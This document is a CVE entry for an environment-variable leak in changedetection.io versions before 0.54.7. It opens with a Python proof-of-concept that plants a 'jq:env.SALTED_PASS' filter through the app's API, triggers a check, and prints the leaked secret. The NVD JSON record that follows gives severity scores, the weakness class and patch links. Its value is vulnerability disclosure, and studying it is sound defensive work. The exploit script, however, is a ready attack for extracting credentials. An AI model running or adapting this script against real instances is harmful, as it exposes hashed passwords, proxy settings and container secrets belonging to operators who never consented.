CVE-2026-33981

# PoC Concept for CVE-2026-33981 # Demonstrates leaking SALTED_PASS via the 'env' builtin in jq filter. import requests TARGET = "http://target-ip:5000" # The malicious payload using the 'env' function # We target 'SALTED_PASS' which is the hashed password jq_payload = "env.SALTED_PASS" # Assuming we create or update a watch request # Endpoint structure is illustrative based on typical REST APIs headers = { "Content-Type": "application/json", # "Authorization": "Bearer <token>" # If auth is enabled } watch_data = { "url": "http://example.com", "title": "PoC Watch", "filter": f"jq:{jq_payload}" } # Step 1: Create/Update watch with malicious filter response = requests.post(f"{TARGET}/api/v1/watch", json=watch_data, headers=headers) if response.status_code == 200: print("Watch created/updated successfully.") # Step 2: Trigger a check to execute the filter watch_id = response.json().get("id") check_resp = requests.post(f"{TARGET}/api/v1/watch/{watch_id}/check", headers=headers) # Step 3: View the snapshot which now contains the leaked env var snapshot_resp = requests.get(f"{TARGET}/api/v1/watch/{watch_id}/snapshot", headers=headers) print("Snapshot content:") print(snapshot_resp.text) else: print(f"Failed to create watch: {response.text}")

{"cve": {"id": "CVE-2026-33981", "sourceIdentifier": "[email protected]", "published": "2026-03-27T22:16:22.793", "lastModified": "2026-04-02T15:24:05.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.54.7", "matchCriteriaId": "70788C7C-32F4-4483-A7F7-83D5DC9D1C6A"}]}]}], "references": [{"url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}